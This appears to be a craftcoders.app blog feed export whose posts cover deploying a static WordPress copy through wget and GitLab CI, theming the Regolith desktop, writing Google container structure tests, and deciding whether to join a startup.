AuthType Basic
AuthName "Only for trusted employees"

# Require a password for the wp installation.
<RequireAny>
    Require expr %{REQUEST_URI} !~ m#^/wp_2789218#
    Require valid-user
</RequireAny>

# Add an easy to remember alias for the wp installation.
RewriteRule ^wp/(.*) wp_2789218/$1 [R=302,L]
RewriteRule ^wp$ wp_2789218/ [R=302,L]

# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it for the server config part. If you go to your.domain.tld then you should see the Hello World from the index.html in the static directory. If you go to your.domain.tld/wp you should get redirected to your WordPress installation and be forced to enter a password.

Generating a static copy of a website

To make a static copy of your website you need a crawler that will start at your start page, follow all links to sub pages and download them as html including all CSS and JavaScript. We tried out several tools and the one that performed the best by far is the good old GNU Wget. It will reliably download all HTML, CSS, JS and IMG resources. But it will not execute JavaScript and therefore fail to detect links generated through JavaScript. In this case you might run into problems. However, most simple WordPress sites should be fine from the get go.

Let’s have a look at the Wget cmd we will use to generate a static copy of our WordPress site:

wget \
    -e robots=off \
    --recursive \
    -l inf \
    --page-requisites \
    --convert-links \
    --restrict-file-names=windows \
    --trust-server-names \
    --adjust-extension \
    --no-host-directories \
    --http-user="${HTTP_USER}" \
    --http-password="${HTTP_PASSWORD}" \
    "https://yourdomain.tld/wp_2789218/" \
    "https://yourdomain.tld/wp_2789218/robots.txt"

Here is an explanation of all the options in use:

  • –e robots=off
    Ignore instructions in the robots.txt.
    This is fine since we’re crawling our own website.
  • –recursive
    Follow links to sub directories.
  • -l inf
    Sets the recursion level depth to infinite.
  • –page-requisites
    Download stuff like CSS, JS, images, etc.
  • –convert-links
    Change absolute links to relative links.
  • –restrict-file-names=windows
    Change filenames to be compatible with (old) Windows. This is a useful option even if you’re not running on Windows or you will get really ugly names that can cause issues with Apache.
  • –trust-server-names
    Uses the filenames of redirects instead of the source url.
  • –no-host-directories
    Download files directly into wp_2789218 and not into yourdomain.tld.
  • –http-user
    The username used for basic auth to access the wp installation. As defined in your .htpasswd.
  • –http-password
    The password used for basic auth to access the wp installation. As defined in your .htpasswd.
  • “https://yourdomain.tld/wp_2789218/” “https://yourdomain.tld/wp_2789218/robots.txt”
    Lists of urls to download. We set this to the start page, Wget will recursively follow all links from there.
    We also copy the robots.txt along.

This will generate a static copy of your WordPress installation in wp_2789218. You can test if the crawling worked by opening the index.html in wp_2789218 with a browser.

Wget will try to rewrite urls in HTML and css, but for meta-tags, inside of JavaScript and in other places will fail to do so. This is where the unique name of our directory comes into play. Because we named it wp_2789218 and not wordpress, we can now safely search and replace through all files in the dump, and replace every occurrence of wp_2789218/, wp_2789218\/, wp_2789218%2F and wp_2789218 with an empty string (“”) so that the links will be correct again in all places. We will use find+sed for that.

Here is the mac OSX variant of that:

LC_ALL=C find wp_2789218 -type f -exec sed -E -i '' 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

And here is the same for Linux with GNU sed:

find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;

To save you the headache (\\\/|%2F|\/)? will match /, \/, %2F and empty string (“”).

Deploying the static copy to a web space

Now that we have generated a static copy of our website, we want to deploy it to /static on the web space. You can do this over rsync+ssh, if you have ssh access to your server.

The command to do so looks like this:

rsync -avh --delete --checksum wp_2789218 "webspaceuser@yourdomain.tld:static"

Remember to adjust the user, domain and path to the directory in webspaceuser@yourdomain.tld:static to your needs.

For our automated deployment with Gitlab, you should create a new private/public ssh keypair using:

ssh-keygen -m PEM -N "" -C "Deploymentkey for yourdomain.tld" -f deploy

This will create deploy and deploy.pub files in your current directory. Copy the contents of deploy.pub to ~/.ssh/authorized_keys on your remote server to allow ssh-ing with it to your server. You can use this one-liner for that:

cat deploy.pub | ssh webspaceuser@yourdomain.tld -- 'mkdir -p ~/.ssh && chmod 700 ~/.ssh && cat - >> ~/.ssh/authorized_keys && chmod 600 ~/.ssh/authorized_keys'

Next test, that you have set up everything correctly by ssh-ing with the new key to your web space:

ssh -i deploy webspaceuser@yourdomain.tld

For Gitlab you will need the signature of your remote ssh server. You can generate it with ssh-keyscan. Copy the output of that, because you will need it in the next step:

ssh-keyscan yourdomain.tld

Putting it all together

Now that we have established all the basics it’s time to put it all together in one gitlab-ci.yml file. But first we need to configure a few variables. On your Gitlab project go to Settings → CI/CD → Variables and create the following variables:

  • $SSH_ID_RSA
    This is the private key that will be used for rsync to upload the static dir. Put the contents of the deploy file that you created in the step before, in here.
    This should be of type File and state Protected.
  • $SSH_ID_RSA_PUB
    This is the public key that will be used for rsync to upload the static dir. Put the contents of the deploy.pub file that you created in the step before, in here.
    This should be of type File.
  • $SSH_KNOWN_HOSTS
    The known host file contains the signature of your remote host.
    This is the output that you generated with ssh-keyscan.
    This should be of type File.
  • $RSYNC_REMOTE
    Example: webspaceuser@yourdomain.tld:static
    The rsync remote to upload the static copy to. This is in the scheme of user@host:directory.
  • $WORDPRESS_URL
    The url to your wordpress installation. This is the starting point for wget.
    This should be of type Variable.
  • $HTTP_USER
    The user used by wget to access your WordPress installation using basic auth. This is the user that you put in your .htpasswd file.
    This should be of type Variable.
  • $HTTP_PASSWORD
    The password for HTTP_USER used by wget to access your WordPress installation using basic auth.
    This should be of type Variable, state Protected and Masked.

Our Gitlab pipeline will have two phases for now: crawl and deploy. They are going to run the commands that we discussed in the previous sections in different docker containers. This is the .gitlabci.yml:

stages:
    - crawl
    - deploy

before_script:
    - echo "[INFO] setup credentials for ssh"
    - mkdir ~/.ssh
    - cp "${SSH_ID_RSA}" ~/.ssh/id_rsa
    - cp "${SSH_ID_RSA_PUB}" ~/.ssh/id_rsa.pub
    - cp "${SSH_KNOWN_HOSTS}" ~/.ssh/known_hosts
    - chmod 600 ~/.ssh ~/.ssh/id_rsa ~/.ssh/id_rsa.pub

crawl:
    image:
        name: cirrusci/wget@sha256:3030b225419dc665e28fa2d9ad26f66d45c1cdcf270ffea7b8a80b36281e805a
        entrypoint: [""]
    stage: crawl

    script:
        - rm -rf wp_2789218 static
        - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt"

        - find wp_2789218/ -type f -exec sed -i -E 's/wp_2789218(\\\/|%2F|\/)?//g' {} \;
        - mv wp_2789218 static
    artifacts:
        paths:
            - static/*
        expire_in: 1 month
    only:
        - master

deploy:
    image:
        name: eeacms/rsync@sha256:de654d093f9dc62a7b15dcff6d19181ae37b4093d9bb6dd21545f6de6c905adb
        entrypoint: [""]
    stage: deploy
    script:
        - rsync -avh --delete --checksum static/ "${RSYNC_REMOTE}"
    dependencies:
        - crawl
    only:
        - master

That’s pretty much it, now you have a pipeline that will generate a static copy of your WordPress site and upload that back to your web space. You could set up a schedule for your pipeline to run automatically on a regular basis or you can use the Run Pipeline button to start the process manually.

We would like to add one more step to our pipeline. It’s always good to do a little bit of testing. Especially if your executing stuff manually without supervision. If the crawler fails for whatever reason to download your complete website, you probably want the pipeline to fail before going into the deploy phase and breaking your website for visitors. So lets perform some basic sanity checks on the static copy before starting the deploy phase. The following checks are all very basic and it’s probably a good idea to add some more checks that are more specific to your installation. Just check for the existence of some sub pages, images, etc. and grep some strings. Also probably you want to make the existing rules a bit stricter.

stages:
    - crawl    - verify_crawl
    - deploy

[...]

verify_crawl:
    image: alpine:3.11.3
    stage: verify_crawl
    script:
        - echo "[INFO] Check that dump is at least 1 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -gt 1

        - echo "[INFO] Check that dump is less than 500 mb in size"
        - test "$(du -c -m static/ | tail -1 | cut -f1)" -lt 500

        - echo "[INFO] Check that there are at least 50 files"
        - test "$(find static/ | wc -l)" -gt 50

        - echo "[INFO] Check that there is a index.html"
        - test -f static/index.html

        - echo "[INFO] Look for 'wordpress' in index.html"
        - grep -q 'wordpress' static/index.html
    dependencies:
        - crawl
    only:
        - master

[...]

Adding a contact form

Even the most basic web sites usually need a little bit of dynamic functionality, in our case we needed a contact form. We decided to go with Ninja Forms Contact Form. Ninja forms work by sending requests to wp-admin/admin-ajax-vhio8powlv.php. This will obviously fail on our static website. To make it work, we will need to reroute requests to admin.ajax.php to our WordPress backend.  The admin-ajax-vhio8powlv.php is used by all sorts of plugins, not only ninja forms and to increase security we want to only whitelist calls for Ninja Forms. Ninja form will make a POST request with application/x-www-form-urlencoded and the parameter action set to nf_ajax_submit. Since there is no way (at least none that we know of) in Apache to filter for form parameters we will need to solve this in PHP. The idea is to create an alternative admin-ajax-vhio8powlv.php to call instead, that in turn will call the wp-admin/admin-ajax-vhio8powlv.php in the WordPress backend, but only for Ninja Form requests. To further increase protection from bots, we will also rename the wp-admin/admin-ajax-vhio8powlv.php to admin-ajax-oAEhFc.php. This won’t really help us against intelligent attackers, but it should stop most bots that try to use an exploit against wp-admin/admin-ajax-vhio8powlv.php.

First we will need to modify the .gitlab-ci.yml  file to add an extra find & sed after wget to the crawl step, to change all urls from wp-admin/admin-ajax-vhio8powlv.php” to “admin-ajax-oAEhFc.php:

[...]
- find wp_2789218/ -type f -exec sed -i -E 's/wp-admin(\\\/|%2F|\/)admin-ajax-vhio8powlv.php/admin-ajax-oAEhFc.php/g' {} \;
[...]

Then we will need to add the admin-ajax-oAEhFc.php to the root of our web space. This file simply checks if this is indeed an Ninja Form call and then include the wp-admin/admin-ajax-vhio8powlv.php from the  WordPress backend. After that we will fix any urls in the output that are still pointing to our WordPress site, so that they point to our static site instead.

<?php 
/* Pass through some functions to the admin-ajax-vhio8powlv.php of the real wp backend. */

// Capture output, so that we can fix urls later.
ob_start();

// Pass through ninja forms
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !empty($_POST) && $_POST['action'] == 'nf_ajax_submit') {
    require (__DIR__ . '/wp_2789218/wp-admin/admin-ajax-vhio8powlv.php');
}

// Everything else should fail.
else {
    echo '0';
}

// Fix urls in output.
$contents = ob_get_contents();
ob_end_clean();


$search_replace = array(
    'wp_2789218/'                => '',
    'wp_2789218\\/'              => '',
    'wp_2789218%2F'              => '',
    'wp_2789218'                 => '',
    'wp-admin/admin-ajax-vhio8powlv.php'    => 'admin-ajax-oAEhFc.php',
    'wp-admin\\/admin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
    'wp-admin%2Fadmin-ajax-vhio8powlv.php'  => 'admin-ajax-oAEhFc.php',
);

echo str_replace(array_keys($search_replace), array_values($search_replace), $contents);

Finally we will need to modify the .htaccess file to allow requests to admin-ajax-oAEhFc.php and to not rewrite them to static/.

[...]
# Rewrite all request to the static directory.
# Except for requests to the wp installation.
RewriteCond %{REQUEST_URI} !^/static.*
RewriteCond %{REQUEST_URI} !^/admin-ajax-oAEhFc.php$
RewriteCond %{REQUEST_URI} !^/wp_2789218.*
RewriteRule ^(.*)$ static/$1 [L]

And that’s it. If you have done everything correctly after running your pipeline again, Ninja Forms should work.

A similar procedure should work for many other plugins too. Tough keep in mind that with every plugin you allow access to your backend, you will also increase the attack surface.

Adding a custom 404 page

You may want to have a custom 404 page instead of the standard 404 error page that Apache will serve by default. Assuming that you have already created a nice looking 404 page in your WordPress installation, in theory we could just use Wget to make a request to an url that does not exists and use the output of that. Unfortunately Wget does a terrible job dealing with non 200 status codes, there is a –content-on-error option that will let it download the contents of a 404 page, but it will refuse to download any images, stylesheets or other resources attached to it.

To deal with that situation we will simply create a normal page in our WordPress backend and use that as a 404 page. So create your page in WordPress and remember the url you gave it.

We can now add that url to our list of files for Wget to download and then use the .htaccess file to redirect all 404 requests to that file.

Ok so lets add our 404 page to the wget cmd in the .gitlab-ci.yml file:

 

[...]
    - |
            wget \
                -e robots=off \
                --recursive \
                --page-requisites \
                --convert-links \
                --restrict-file-names=windows \
                --http-user="${HTTP_USER}" \
                --http-password="${HTTP_PASSWORD}" \
                --no-host-directories \
                --trust-server-names \
                --adjust-extension \
                --content-on-error \
                "${WORDPRESS_URL}/" \
                "${WORDPRESS_URL}/robots.txt" \
                "${WORDPRESS_URL}/notfound"
[...]

To redirect all 404 errors to notfound/index.html we will have to add one instruction to the .htaccess file:

ErrorDocument 404 /static/notfound/index.html

If you have done everything correctly after you run your pipeline and visit any non exisiting url you should get your custom error page. However if you try to access a deeper level like yourdomain.tld/bogus/bogus/bogus it propabbly looks really fucked up like this:

This is because Wget will rewrite all links to be relative and we access our 404 page from different paths. To fix this we can add a <base> tag inside of the <head> with an absolute url. We insert the base tag with sed after running Wget in the .gitlab-ci.yml like this:

[...]
        - sed -i 's|<head>|<head><base href="/notfound/">|' wp_2789218/notfound/index.html
[...]

And that’s it, if you run your pipeline again the 404 page should look fine:

Conclusion

We have successfully created a Gitlab job that generates and publishes a static copy of a WordPress site and secured the actual WordPress backend against attacks of bots and humans. And because of the 2000 free minutes of CI that Gitlab is currently offering, it didn’t even cost us a dime. If you can live with the limitations of a static website, we’re definitely recommending this or a similar solution to you. It will push the risk of getting hacked near zero and you will no longer need to spend precious time ensuring that your site and all of it’s plugins are up to date. Also your site will be as fast as lightening.

Go ahead and fork: https://gitlab.com/sgellweiler/demo-wordpress-static-copy. And let us know how it works for you in the comment section.

Best regards,

Sebastian Gellweiler

]]>
Regolith Quickstart: Creating a Custom-Theme https://craftcoders.app/regolith-quickstart-creating-a-custom-theme/ Fri, 14 Feb 2020 09:00:21 +0000 https://craftcoders.app/?p=1088 Read More]]> This post is intended for beginners of i3 or more specifically Regolith. Since i3 is just a window-manager and not a fully fletched desktop environment you might have encountered some issues using a pure version of i3.

Regolith is a modern desktop environment that saves you time by reducing the clutter and ceremony that stand between you and your work. Built on top of Ubuntu and GNOME, Regolith stands on a well-supported and consistent foundation. (from Regolith website)

Regolith on the other hand integrates i3 into Ubuntu and Gnome. Even though I didn’t expected it, Regolith really works like a charme. The only thing that can be tricky on first sight is customization and that’s what we’re going to tackle right now!

Preview

Here are two sample images of the system we’re trying to create.

Components

Regolith consists of a couple components to make configuration easier. In the screenshot below you can see where each component comes into play. (and how your system should look like at the end of this tutorial)

regolith-screenshot

The screenshot can give a first impression, but it doesn’t contain all the components that are involved. Rofi for example can be seen in the second preview picture. Let’s dig a little bit deeper to get a better understanding of configuration:

Component Description Influencing style of
i3gaps i3gaps is a fork of i3 with additional functionality. i3 is a dynamic tiling window manager, but you probably know it already if you chose to read this post. i3xrocks
Xresources Xresources is a user-level configuration dotfile, typically located at ~/.Xresources . This is more or less our “root-config” that loads all other component-configs everything
Rofi Rofi, will provide the user with a textual list of options where one or more can be selected. Mostly for running an application, or selecting a window
i3xrocks i3xrocks is a Regolith-fork of i3blocks that uses Xresources. i3blocks generates a status bar with user-defined blocks like a clock
compton Compton is a compositor for X based on Dana Jansens’ version of xcompmgr. Kurzgesagt, it renders your display-output. i3gaps, i3xrocks, Rofi

Creating a Custom-Theme

So now we’re getting to the fun part. All the proposed components have their own system-global configuration files. At the end of the Regolith Customize wiki page, you can see each configurations’ location.

Setting a background image

Let’s start out easy. Since Regolith handles the integration between your Ubuntu settings and the i3-wm you can use the Ubuntu settings to replace your background image. Hit SUPER+C and navigate yourself to the background tab. If you want you can download my wallpaper here.

Staging configuration files

First, we need to stage the Xresources file, which means to copy it to a user-accessible location. Furthermore, we need to create a folder to stage our other configuration files:

$ cp /etc/regolith/styles/root ~/.Xresources-regolith
$ mkdir ~/.config/regolith/

If you take a look at the Xresources config, you can see that all it does is referencing these configurations:

  1. Color theme
  2. System font
  3. GTK Theme
  4. st-term (Regolith default terminal)
  5. i3-wm
  6. i3xrocks
  7. Rofi
  8. Gnome

We’re heading for the files in the “styles” folder. They are only for theming, so don’t confuse them with the config files that change the applications’ behavior like “~/.config/i3/config”. Let’s stage some of these style-configs and apply our new styles:

$ mkdir ~/.config/regolith/styles/
$ cp /etc/regolith/styles/color-nord ~/.config/regolith/styles/custom-coloring
$ cp /etc/regolith/styles/theme-regolith ~/.config/regolith/styles/theme-sweet
$ cp /etc/regolith/styles/i3-wm ~/.config/regolith/styles/i3-wm

A custom coloring scheme

These are the colors that will be used in your desktop environment. Just copy the content into your own file. If you want to define your own colors coolors.co is a good starting point to get inspiration 🙂

--- File: custom-coloring ---

! Custom colors
#define color_base03   #26262d
#define color_base02   #474956
#define color_base01   #4c4d5b
#define color_base00   #c0c3db
#define color_base0    #edf2ff
#define color_base1    #E5E9F0
#define color_base2    #ECEFF4
#define color_base3    #f2f5f9
#define color_yellow   #edcd8e
#define color_orange   #e59572
#define color_red      #e57472
#define color_magenta  #908dc4
#define color_violet   #9d8dc4
#define color_blue     #81A1C1
#define color_cyan     #88C0D0
#define color_green    #A3BE8C

GTK and icon theme

--- File: theme-sweet ---

#define gtk_theme       Sweet-Dark
#define icon_theme      Sweet-Purple

For this to work, you need to copy the Sweet icon-theme and Sweet GTK theme onto your machine. Of course, you are free to choose whatever theme you like. Their names (Sweet-Dark for the theme and Sweet-Purple for the icons) are defined in their config files both named “index.theme”. My setup is available here:

You need to copy them to one of the two possible paths:

Theme: ~/.themes/ or /usr/share/themes/
Icons: ~/.icons/ or /usr/share/icons/ 

i3-wm config

The i3-wm config (for i3gaps) defines which color from our custom-coloring file is used for what. Furthermore, it defines how workspaces are displayed in i3bar and how i3xrocks looks in general. So now is the time to define which workspace should be used for which use-case. In my case I have separate workspaces for

  • Browser
  • Terminals
  • Text Editing (VS-Code)
  • Coding (IDE’s like IntelliJ)
  • Chatting
  • Music

All the other workspaces are used randomly, thus called “Other”.

--- File: i3-wm ---

#define Q(x) #x
#define QUOTE(x) Q(x)

#define glyph typeface_bar_glyph_workspace

i3-wm.bar.font: typeface_bar

i3-wm.bar.background.color: color_base03
i3-wm.bar.statusline.color: color_base00
i3-wm.bar.separator.color: color_yellow
i3-wm.bar.workspace.focused.border.color: color_base02
i3-wm.bar.workspace.focused.background.color: color_base02
i3-wm.bar.workspace.focused.text.color: color_base2
i3-wm.bar.workspace.active.border.color: color_base02
i3-wm.bar.workspace.active.background.color: color_base02
i3-wm.bar.workspace.active.text.color: color_base00
i3-wm.bar.workspace.inactive.border.color: color_base03
i3-wm.bar.workspace.inactive.background.color: color_base03
i3-wm.bar.workspace.inactive.text.color: color_base00
i3-wm.bar.workspace.urgent.border.color: color_red
i3-wm.bar.workspace.urgent.background.color: color_red
i3-wm.bar.workspace.urgent.text.color: color_base3

i3-wm.client.focused.color.border: color_base03
i3-wm.client.focused.color.background: color_base01
i3-wm.client.focused.color.text: color_base3
i3-wm.client.focused.color.indicator: color_blue
i3-wm.client.focused.color.child_border:

i3-wm.client.focused_inactive.color.border: color_base03
i3-wm.client.focused_inactive.color.background: color_base02
i3-wm.client.focused_inactive.color.text: color_base0
i3-wm.client.focused_inactive.color.indicator: color_base02
i3-wm.client.focused_inactive.color.child_border:

i3-wm.client.unfocused.color.border: color_base03
i3-wm.client.unfocused.color.background: color_base02
i3-wm.client.unfocused.color.text: color_base0
i3-wm.client.unfocused.color.indicator: color_base02
i3-wm.client.unfocused.color.child_border:

i3-wm.client.urgent.color.border: color_base03
i3-wm.client.urgent.color.background: color_red
i3-wm.client.urgent.color.text: color_base3
i3-wm.client.urgent.color.indicator: color_red
i3-wm.client.urgent.color.child_border:

#define glyph_font QUOTE(typeface_bar_glyph)
#define WORKSPACE_NAME(INDEX, NAME, FONT) INDEX<span font_desc=FONT> INDEX: NAME </span>

i3-wm.workspace.01.name: WORKSPACE_NAME(1, BR0WSER, glyph_font)
i3-wm.workspace.02.name: WORKSPACE_NAME(2, T3RM, glyph_font)
i3-wm.workspace.03.name: WORKSPACE_NAME(3, ED1T1NG, glyph_font)
i3-wm.workspace.04.name: WORKSPACE_NAME(4, C0D1NG, glyph_font)
i3-wm.workspace.05.name: WORKSPACE_NAME(5, C0D1NG, glyph_font)
i3-wm.workspace.06.name: WORKSPACE_NAME(6, 0TH3R, glyph_font)
i3-wm.workspace.07.name: WORKSPACE_NAME(7, 0TH3R, glyph_font)
i3-wm.workspace.08.name: WORKSPACE_NAME(8, 0TH3R, glyph_font)
i3-wm.workspace.09.name: WORKSPACE_NAME(9, CH4T, glyph_font)
i3-wm.workspace.10.name: WORKSPACE_NAME(10, MUS1C, glyph_font)
i3-wm.workspace.11.name: WORKSPACE_NAME(11, 0TH3R, glyph_font)
i3-wm.workspace.12.name: WORKSPACE_NAME(12, 0TH3R, glyph_font)
i3-wm.workspace.13.name: WORKSPACE_NAME(13, 0TH3R, glyph_font)
i3-wm.workspace.14.name: WORKSPACE_NAME(14, 0TH3R, glyph_font)
i3-wm.workspace.15.name: WORKSPACE_NAME(15, 0TH3R, glyph_font)
i3-wm.workspace.16.name: WORKSPACE_NAME(16, 0TH3R, glyph_font)
i3-wm.workspace.17.name: WORKSPACE_NAME(17, 0TH3R, glyph_font)
i3-wm.workspace.18.name: WORKSPACE_NAME(18, 0TH3R, glyph_font)
i3-wm.workspace.19.name: WORKSPACE_NAME(19, 0TH3R, glyph_font)

Using our new configurations

Now we can finally make use of our new config files. Therefore we need to replace the reference in our .Xresources-regolith file. In the end it should look something like this: (make sure to replace USER with your username)

--- File: .Xresources-regolith ---

! This is the Regolith root-level Xresources file.
!
! -- Styles - Colors
!
! Uncomment one and only one of the following color definitions: 
#include "/home/USER/.config/regolith/styles/custom-coloring"

! -- Styles - Fonts
! NOTE: Font packages may need to be installed when enabling typefaces.
! Uncomment one and only one of the following font definitions:
#include "/etc/regolith/styles/typeface-sourcecodepro"
!#include "/etc/regolith/styles/typeface-ubuntu"

! -- Styles - Theme
! NOTE: GTK theme and icon packages may need to be installed when enabling themes.
! Uncomment one and only one of the following theme definitions:
!
#include "/home/USER/.config/regolith/styles/theme-sweet"

! -- Applications
! These files map values defined above into specific app settings.
#include "/etc/regolith/styles/st-term"
#include "/home/USER/.config/regolith/styles/i3-wm"
#include "/etc/regolith/styles/i3xrocks"
#include "/etc/regolith/styles/rofi"
#include "/etc/regolith/styles/gnome"

As you can see, we also replaced the system font from typeface-ubuntu to typeface-sourcecodepro. Now save, logout and back in, so that your changes can be applied.

Conclusion

That’s it! Now your system should be really similar to the screenshots above 🙂 As you can see customization is pretty straightforward as soon as you got a basic understanding of the used components and their configurations. If you want take a look at staging your own i3- and i3xrocks config files, to use your new desktop environment to the fullest. Alternatively, you can take a look at my dotfiles to get a glimpse of my system. Whatever you do, have fun tweaking your UI!

Greetings, Domi

]]>
Sophisticated Google container structure tests https://craftcoders.app/sophisticated-google-container-structure-tests/ Mon, 20 May 2019 08:00:39 +0000 https://craftcoders.app/?p=1043 Read More]]> Last week we did an innovation week at our company, crowding up together and trying to figure out what can be done to improve our systems. Our group chose to setup a private docker registry and to automate the creation of docker images for our test-system. After some research we came up with Google’s framework named container structure tests, to verify that the automatically created containers are actually working.

The Container Structure Tests provide a powerful framework to validate the structure of a container image. These tests can be used to check the output of commands in an image, as well as verify metadata and contents of the filesystem.

GoogleContainerTools @ Github

The way it is always, you can create very simple test scenarios very fast, but there is few documentation when it comes to more complicated stuff. With this post I want to sum up the pitfalls you might encounter and offer solutions, so you can get the most out of the framework. If you need to know the basic stuff first jump over to the read-me and come back later 😉

Pitfalls and solutions

Image entry-points are removed by default

Every docker container comes with an entry-point defining what it should do on startup. These can influence the structure of the container or consume a lot of time, so they are removed by default. In our case we needed the entry-point, since we wanted to test whether our PostgreSQL container is working properly. What you should do (according to the docs) is using the setup section of the test like so:

commandTests:
  - name: "postgres starts without errors"
    setup:
      - ["./docker-entrypoint.sh", "postgres"]
    command: "psql"
    args: ["-d", "db-name", "-U", "db-user", "-c", "\q"]

This small test should start a new container, run the entrypoint script for postgres and finally check that we can connect to a database without any error. The exit code is expected to be zero by default. Sadly, this is not how it actually works as you will see in the next section.

Every command runs in a separate container instance

The setup section and the teardown section as well, are a list of commands, whereas the command section is just a single command. All of these commands run in their own separate container and then commit a modified image to be the new base image for the next command in the list. Since in our postgres example the entrypoint is starting a database in a setup command, this database will be running in this command’s container only. This leads to the need of multiple commands in the same container, which we can’t accomplish using the setup section.

Multi-line commands

We can trick the framework to run multiple commands in the same container using bash -c <list of commands>. Since this can get convoluted pretty fast, we can make use of YAML’s “literal style” option (the | sign) to preserve newlines.

  - name: "postgres starts without errors"
    command: "bash"
    args:
      - -c
      - |
          bash -c './docker-entrypoint.sh postgres &' &&
          sleep 10 &&
          psql -d "db-name" -U "db-user" -c '\q'

This is the final (and actually working) version of the same test. As you can see, we are now running the docker-entrypoint script in the same container like the psql command. But since the script is starting a database instance we had to wrap it up in a second bash -c command so we could detach it from the console output with the ampersand (&) at the end. Furthermore we had to add some sleep time to give the database a chance to come up before we check if it is working.

Switching user profiles

Sometimes it might be necessary to run a command as a different user than root. As user postgres for example 😀 Fortunately, this can be accomplished similar to bash -c using su -c like that:

  - name: "run a command as a different user"
    command: "su"
    args:
      - postgres
      - -c
      - whoami
    expectedOutput: ["postgres"]

Alrighty, that’s all I wanted to share for now. I hope the post will spare some time of yours. Please keep in mind that Google’s framework container structure tests has been made to verify the structure and general setup of your container. It is not meant to be used for something like integration tests. Thank’s for reading and have a nice day 🙂

Greets, Domi

]]>
Startup: To join or not to join? https://craftcoders.app/startup-to-join-or-not-to-join/ Mon, 04 Feb 2019 09:00:19 +0000 https://craftcoders.app/?p=955 Read More]]> Hey everybody. A few days ago a friend of mine asked me for advice about joining or not joining a startup. After I answered him, I got excited to share my condensed thoughts with you in this blog post. He asked me since I was very enthusiastic about founding my own startup. Back in the days, I told him about my idea and my friends who’d be joining me in that adventure.

Boy, was I refreshingly naive! Not yet naive enough to actually start something just like that, but get informed and involved before. Yet, it was perfect to dig the whole start-up topic. Later, see a starter-pack of my personal recommendations to this topic. But first, let’s get to business…

What’s the situation?

Soon, he will finish his dissertation in medical engineering. A really smart, friendly and quick-witted guy. A friend of his asked him what he wants to do after he’s done with the diss. After they talked, he ended up with an offer. He can get involved in the startup his friend founded. He’d get paid way under his market value, but owns company shares. Wow! What a tricky situation. Tough call, I’d say. This led to him asking me how much such a startup can be worth, unfortunately without any further context.

Obviously, there is no clear number I could tell him, no yes-or-no, do-or-don’ts. Instead, I tried to convert my current state of mind into a dense checklist. He could use my thoughts for checking if it could be a proper invest.

My advice

I tried to roughly differentiate between four main criteria-categories. All can be crucial for taking this decision:

  1. The Problem
  2. Strategy and Methodology
  3. Figures
  4. You

Just remember: The answers and gotta fit to your liking. There’s no “good vs. bad”. In most of the cases, there is no right or wrong – it is entirely up to your thoughts, preferences and personal plans.

Point 1 – The Problem

Meaning the problem the startup should be called to solve.

  • Do you yourself believe that enough people have this problem AND want to solve it AND don’t want to solve it well enough in another way?
  • How much work has been invested into the startup already?
  • Is the founder already too much in love with his solution? This is like a pre-programmed deathblow for a startup. Founder and their team should be in love with the problem instead!
  • Can a solution to the problem be sold/presented well and possibly monetized in the long run?

Point 2 – Strategy and Methodology

  • Does the founder want to achieve a good exit, that is, sell the solution at a great value to a big fish?
  • Are there plans to scale the company asap, or put in a HEALTHY growth?
  • Is the Founder (or someone else in the team) a good salesman/ speaker? Because this is one of the most important activities of a founder: selling!
  • How methodically does the startup proceed? It is important that the management team is really literate and enthusiastic about lean startup/ design thinking/ design sprint/ human-centered design! Like this, a startup increases the probability to alleviate the main problem of startups in the best possible way: too little time for much too much to do. Read about my info starter-pack recommendations below.

Point 3 – Figures

To come back to his exact question. Of course, there are these and such cases.

  • How is the financial plan and current situation?
  • It is quite possible that in the first 3 – 7 years business will not be in profit. Still, it can increase in value if it proves itself to be growing strongly (not necessarily by headcount).
  • In Germany, startups with a hardware product are usually much more likely to go into prepayment. This is followed by lower margin promises and scalability, as opposed to digital goods.
  • German investors are not very fond of high investments (in comparison to other countries). That’s (also) why digital products (and especially platforms) are more of a trend. As a team of five you can already solve a huge problem at scale. Not necessarily the first solution has to be scalable, though. A pearl of start-up wisdom says: Do unscalable experiments first. Find out what you need to do without too much pre-investing.

Point 4 – You

  • Is the vision suitable for you? Can you feel being a missionary for what the company wants to stand for? Does it catch you, and you feel the fire burning inside of you?
  • Are you ready to join the company full-time? Maybe you don’t need to invest much more than 40/ 50 hours per week to be successful. Still, usually, the bottom line is that it’s more like two full-time jobs. Especially if you have shares in such a company. Your motivation might be pretty strong to get it profitable.
  • Statistically, your chances are about 10% that you can make a profit with your shares. By the points above you can decide whether it is rather less or rather more than a 10% chance.
  • Determine the possible effect on your CV. E.g. in my friends’ case working in a startup is actually doing good to his vitae. As a postgraduate, he’d prove his interest in the market and the creation of good products, as opposed to being brain-bound (as postgraduates are said to be).
  • So your main investment would be your work performance and the opportunity costs (salary you could otherwise get).

Info Starter-Pack

Here is my personal list for getting informed. Listen to podcasts like Masters of Scale by Reid Hoffman and Wireframe from Gimlet Creative. Check out TEDxTalks, and start with the one that’s really sticking in my head Start With The Why by Simon Sinek. Figuratively eat books like Lean Startup by Eric Ries, Inspired by Marty Cagan, User Story Mapping by Jeff Patton, Sprint by Jake Knapp, John Zeratsky and Braden Kowitz, Actionable Gamification by Yu-Kai Chou, Even Ninja Monkeys Like To Play by Marczewski, Hit Refresh by Satya Nadella and the Autobiography of Goetz Werner. Don’t just read them, but work them through! Make notes, summarize chapters and make notes for your later self (even if you might never read them again). Go on Founding-enthusiasts-meetups, participate at Hackathons (like us), talk about your ideas and concepts and explore the unexplored.

Now, around 1.5 years after I started digging the topic, I ended up becoming a product owner in a solid startup called sofatutor, and this brought me to a realization. If you wanna make the world a better place, solve real problems of the people and create something special, you don’t necessarily have to be a founder of a startup yourself. Every (small) company can win by people like you. You can bring all your enthusiasm into place and make it to your project!

